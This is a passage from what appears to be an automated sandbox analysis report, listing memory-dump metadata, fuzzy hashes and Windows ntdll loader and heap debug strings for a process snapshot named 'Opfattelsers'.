                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                            • API String ID: 3446177414-2196497285
                                                                            • Opcode ID: 5be6531b029f2c2de163cd6752fc405da18e95da38e9185e6edc61d691b579f5
                                                                            • Instruction ID: b4916e83e67bd627335a6a4f586a323b9e07d16815d982540d1b9e20bef22e79
                                                                            • Opcode Fuzzy Hash: 5be6531b029f2c2de163cd6752fc405da18e95da38e9185e6edc61d691b579f5
                                                                            • Instruction Fuzzy Hash: 5AE1BF706083429FDB14CF24C890B9AB7E5FF89318F454A2DE896DB391E771E944CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 3446177414-1745908468
                                                                            • Opcode ID: 0911bed51ec7dc5fdf7bb95e7f1bf1752f2032f21792fc681373b49614156586
                                                                            • Instruction ID: a83e14ce45e635ac16a743b8e2b184191450d4a0f99ced5ca3d4d0aeccd7df21
                                                                            • Opcode Fuzzy Hash: 0911bed51ec7dc5fdf7bb95e7f1bf1752f2032f21792fc681373b49614156586
                                                                            • Instruction Fuzzy Hash: 3391EF35910689DFCB05CF68D888BE9BBF1FF49724F24805DE4459F261DB36A942CB14
                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1F79656C
                                                                              • Part of subcall function 1F7965B5: RtlDebugPrintTimes.NTDLL ref: 1F796664
                                                                              • Part of subcall function 1F7965B5: RtlDebugPrintTimes.NTDLL ref: 1F7966AF
                                                                            Strings
                                                                            • apphelp.dll, xrefs: 1F796496
                                                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 1F7F9A2A
                                                                            • LdrpInitShimEngine, xrefs: 1F7F99F4, 1F7F9A07, 1F7F9A30
                                                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 1F7F9A01
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1F7F9A11, 1F7F9A3A
                                                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 1F7F99ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-204845295
                                                                            • Opcode ID: e7e5ab954fcf28e286dbca7d73ee62dbf2fa978c68cea720a2569a301da27500
                                                                            • Instruction ID: 6e994feb9518e6e7608389cb9e4493ae505e937470ebc74cfd9582f2c308637c
                                                                            • Opcode Fuzzy Hash: e7e5ab954fcf28e286dbca7d73ee62dbf2fa978c68cea720a2569a301da27500
                                                                            • Instruction Fuzzy Hash: F25170B5218304AFD324DF24DC85F9B77E8FF84764F404A19F9969B260EA31E944CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                            • API String ID: 3446177414-4227709934
                                                                            • Opcode ID: 993a15458fb1ee73505aad2462688645e0f2d5d3f19cde0787dc70bf3901adf7
                                                                            • Instruction ID: 95734ec92d2eeb032775550f6651348523563a4bec5b246859192fb0df2219e6
                                                                            • Opcode Fuzzy Hash: 993a15458fb1ee73505aad2462688645e0f2d5d3f19cde0787dc70bf3901adf7
                                                                            • Instruction Fuzzy Hash: F6416FB5A04219AFCB05DF99C980AEEBBB5FF98714F140219E905AF341D731ED12DBA0
                                                                            APIs
                                                                            Strings
                                                                            • LdrpLoadShimEngine, xrefs: 1F7F9ABB, 1F7F9AFC
                                                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F7F9AF6
                                                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F7F9AB4
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1F7F9AC5, 1F7F9B06
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-3589223738
                                                                            • Opcode ID: 6ef5d3f1f4d5c429054c449e480ec27be3d3250e9dccabe06353fe98885ab900
                                                                            • Instruction ID: 56e8221dcca24d6dea312e374d18ddae70af9a702288d703355126628272bd6c
                                                                            • Opcode Fuzzy Hash: 6ef5d3f1f4d5c429054c449e480ec27be3d3250e9dccabe06353fe98885ab900
                                                                            • Instruction Fuzzy Hash: 945127B5A103589FCB08DBA8DC98FDD77B6BB84324F050229E451AF295DB72BC50CB90
                                                                            APIs
                                                                            Strings
                                                                            • ---------------------------------------, xrefs: 1F84F279
                                                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1F84F263
                                                                            • Entry Heap Size , xrefs: 1F84F26D
                                                                            • HEAP: , xrefs: 1F84F15D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                            • API String ID: 3446177414-1102453626
                                                                            • Opcode ID: 5391f1e977267bb8906f29cb3e9c47a1a39ed01211522db1ceb6fbf29440f112
                                                                            • Instruction ID: cda362d4d47add40bc68634dc05e907b4fd0734da7e91b0c59f159f1cd15774a
                                                                            • Opcode Fuzzy Hash: 5391f1e977267bb8906f29cb3e9c47a1a39ed01211522db1ceb6fbf29440f112
                                                                            • Instruction Fuzzy Hash: 2B414C39A0122EEFC709CF58D488A56BBE5FF89364725816ED4099F311D732BD52CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                            • Instruction ID: 956d02e5935ac548af32129aaf36c6ef7d2f954f3ec1324ef62978e3d60f9f74
                                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                            • Instruction Fuzzy Hash: DF02F4B5508341AFD309CF28C894B6FBBE5EFC8714F108A2DB9855B264EB31E945CB52
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 1787c09b10dca2cdb364b181459faf8841648e1d5572a3bba6c3b5e905d021f2
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: 4E819274E052499EDB048E6CC8917FEBFB2AF49310F18425BD851AB693D734A850CBB0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$@
                                                                            • API String ID: 3446177414-1194432280
                                                                            • Opcode ID: 8200e0bd82e752c3ad8ad25988e9dc6f8e4dbae3576e72b5df476584424345b8
                                                                            • Instruction ID: 9385a4c93c0e2c9150865f989b4e2e4f5ce0a2b6d41d0105dcabe4f902cb7174
                                                                            • Opcode Fuzzy Hash: 8200e0bd82e752c3ad8ad25988e9dc6f8e4dbae3576e72b5df476584424345b8
                                                                            • Instruction Fuzzy Hash: 60814D75D002699BDB25DF54CC44BDEB7B4AF48710F0142EAE91AB7280E771AE84CFA0
                                                                            APIs
                                                                            Strings
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1F81365C
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1F813640, 1F81366C
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F81362F
                                                                            • LdrpFindDllActivationContext, xrefs: 1F813636, 1F813662
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-3779518884
                                                                            • Opcode ID: 7f7f9bfc76d69a24ffe3901aec29cce65dcec1130b1b62345a57b40a5a8f4b8c
                                                                            • Instruction ID: 89738775a6ce4de336081583971351bdfa1d65b6cf3bdf4e07008b0473386a5a
                                                                            • Opcode Fuzzy Hash: 7f7f9bfc76d69a24ffe3901aec29cce65dcec1130b1b62345a57b40a5a8f4b8c
                                                                            • Instruction Fuzzy Hash: 2D312C72D00352AFDB219F18CC88BD572A4BB06754F864276FA495F260E771BC80C7D5
                                                                            Strings
                                                                            • apphelp.dll, xrefs: 1F7C2462
                                                                            • LdrpDynamicShimModule, xrefs: 1F80A998
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1F80A992
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1F80A9A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: 0573eca64ef8b99c463f40b467ffdb948008b91e791705cb806db5594def8e57
                                                                            • Instruction ID: d0bbd94db283e7883abe1e2256189bc8f6285a51d581f8c82521ee0f8b52746e
                                                                            • Opcode Fuzzy Hash: 0573eca64ef8b99c463f40b467ffdb948008b91e791705cb806db5594def8e57
                                                                            • Instruction Fuzzy Hash: CB313B71700212EBD718AF68CD89EAAB7B9FBC4714F560229E810AF250D7736D52C780
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 544279ff60038203f62fbabefe9ace8ddd689ea320712b766b1d4db42147eef2
                                                                            • Instruction ID: a8a8f1bd2a8bfac651423b3e58302421666c2dca86abc1e8699baf484e626d40
                                                                            • Opcode Fuzzy Hash: 544279ff60038203f62fbabefe9ace8ddd689ea320712b766b1d4db42147eef2
                                                                            • Instruction Fuzzy Hash: 1B215E7AA00219ABCB04DE79DC44AEF7BE9AF58754F450126F955E7200FB30FA018BA1
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1F8102E7
                                                                            • RTL: Re-Waiting, xrefs: 1F81031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1F8102BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: cd2dc5b162080ccd920e880cfc8b90e7bda2eeb7e08a269888c21e10d30150b5
                                                                            • Instruction ID: 482f4c5663e6880928589fdf6ea507cd2368d52fac1c2d4af2ebb63e44d789e1
                                                                            • Opcode Fuzzy Hash: cd2dc5b162080ccd920e880cfc8b90e7bda2eeb7e08a269888c21e10d30150b5
                                                                            • Instruction Fuzzy Hash: B2E1AF346087429FD715CF28C884B9AB7E1BF88314F100B2DE5A58F2E1D774E946CB92
                                                                            APIs
                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 1F80A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 1F80A10F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1F80A121
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-161242083
                                                                            • Opcode ID: eaf886e89b20d98b8166b3373595eeef68afe22a825e692215aa8111c1d11e02
                                                                            • Instruction ID: fef111c24060edeffc891cec5e21db8d6ff5021bca1da5b4d56fb856265aafce
                                                                            • Opcode Fuzzy Hash: eaf886e89b20d98b8166b3373595eeef68afe22a825e692215aa8111c1d11e02
                                                                            • Instruction Fuzzy Hash: EB71CC74A00206DFDB19DF68CD84AAEB7F4FF89314F14422DD916EB250E736A941CB90
                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1F878B03
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1F878B5B
                                                                              • Part of subcall function 1F7E2B60: LdrInitializeThunk.NTDLL ref: 1F7E2B6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$InitializeThunk
                                                                            • String ID: $File
                                                                            • API String ID: 1259822791-2412145507
                                                                            • Opcode ID: 2172156931b783127b73f0aee9f142daf458881502212fb59023e3f961a376bf
                                                                            • Instruction ID: df60db2156aaa70de3ad230fd9b6c6c37008be940458a50583fde953036f3ab5
                                                                            • Opcode Fuzzy Hash: 2172156931b783127b73f0aee9f142daf458881502212fb59023e3f961a376bf
                                                                            • Instruction Fuzzy Hash: AC618571A2021C9BDB26CF24DC45BE9B7B9AB48710F1442E9E509EB191EB70AF84CF54
                                                                            APIs
                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 1F8182DE
                                                                            • Failed to reallocate the system dirs string !, xrefs: 1F8182D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1F8182E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1783798831
                                                                            • Opcode ID: 1af8ca088f9a17517aee1e8ed22904c4439b5f00b07995362aaceac9dbe0062b
                                                                            • Instruction ID: eb45eb4d2721809f74072250031458efe4ebb7c402d09feed9acac4ec16e3aba
                                                                            • Opcode Fuzzy Hash: 1af8ca088f9a17517aee1e8ed22904c4439b5f00b07995362aaceac9dbe0062b
                                                                            • Instruction Fuzzy Hash: FE4112B5515311ABC715DB64DC88B8B77E8BF88760F400A2AF859DB290E736F810CB91
                                                                            Strings
                                                                            • RTL: Resource at %p, xrefs: 1F817B8E
                                                                            • RTL: Re-Waiting, xrefs: 1F817BAC
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1F817B7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: ee85014844f7668cbfc0a5fec1ea7ef90ccc06dee13755998455a076b4f70eb2
                                                                            • Instruction ID: 22bc15aadf82d00b16735c406723884eb8f5101343c77a2d05da81a5d04dab8f
                                                                            • Opcode Fuzzy Hash: ee85014844f7668cbfc0a5fec1ea7ef90ccc06dee13755998455a076b4f70eb2
                                                                            • Instruction Fuzzy Hash: D841DE357047029FC724CE29D840B6AB7E5EF88720F500A2DF99A9F280EB30F805CB91
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1F81728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1F817294
                                                                            • RTL: Resource at %p, xrefs: 1F8172A3
                                                                            • RTL: Re-Waiting, xrefs: 1F8172C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 6890bdc29b1e0ca59ac3810aa428cf59e1e14b8869c98d54ca2707eaebf08e98
                                                                            • Instruction ID: eb2192cd97992f66e8b48963e0f51f31472670080243e5e34131a806efe38f11
                                                                            • Opcode Fuzzy Hash: 6890bdc29b1e0ca59ac3810aa428cf59e1e14b8869c98d54ca2707eaebf08e98
                                                                            • Instruction Fuzzy Hash: C241BD35604346AFD710DE29CC41BAAB7A5EF88710F14062DF956AF240EB31F856C7D1
                                                                            APIs
                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1F824888
                                                                            • LdrpCheckRedirection, xrefs: 1F82488F
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 1F824899
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 3446177414-3154609507
                                                                            • Opcode ID: 7ee8fded812e85958bba3d206f6dc56a7605145471c873ea0165167822a6deba
                                                                            • Instruction ID: 4d171d96dcb65111cf1375ddf41d6660b2b241351bbdf9538658b9da192df1a4
                                                                            • Opcode Fuzzy Hash: 7ee8fded812e85958bba3d206f6dc56a7605145471c873ea0165167822a6deba
                                                                            • Instruction Fuzzy Hash: 6C41A172B242A5DFCB15CE6CC840A567BF4BF89750B420659EC989F352E731F880CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
